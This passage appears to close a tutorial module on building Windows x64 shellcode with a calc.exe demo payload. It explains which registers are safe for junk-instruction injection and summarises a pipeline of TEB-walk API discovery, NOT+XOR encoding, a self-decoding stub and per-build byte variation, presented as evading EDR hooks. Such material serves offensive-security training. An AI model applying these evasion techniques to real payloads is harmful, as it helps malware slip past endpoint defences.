Even when RSP and RBP appear absent from the shellcode's explicit instructions, they always have implicit roles. RSP is the active stack pointer: always in use, and changed by every push, pop, call, and ret. Inserting junk that modifies RSP would immediately corrupt the stack and crash execution.

RBP is excluded defensively — even if the shellcode doesn't explicitly use it, the compiler or linker may use frame-pointer conventions that depend on RBP being stable. It's excluded from the candidates list unconditionally:

[r for r in candidates if r not in ['rsp', 'rbp']]

For the calc.asm TEB-walk shellcode, the registers available for junk injection are typically r12, r13, r14 — the non-volatile callee-saved registers not needed in the KERN search or WinExec call chain. The script prints them on stderr when it runs so you can verify.

✓ Module Complete. You now have a full end-to-end shellcode pipeline running natively on Windows — no msfvenom, no Linux VM: TEB-walk kernel32 discovery that bypasses EDR position hooks, Windows-native .obj byte extraction, NOT+XOR encoding with self-embedded key, an x64 decoder stub that decodes in-place and jmps to the payload, and alpha/mix conversion for C string literal delivery. No two builds produce the same bytes.
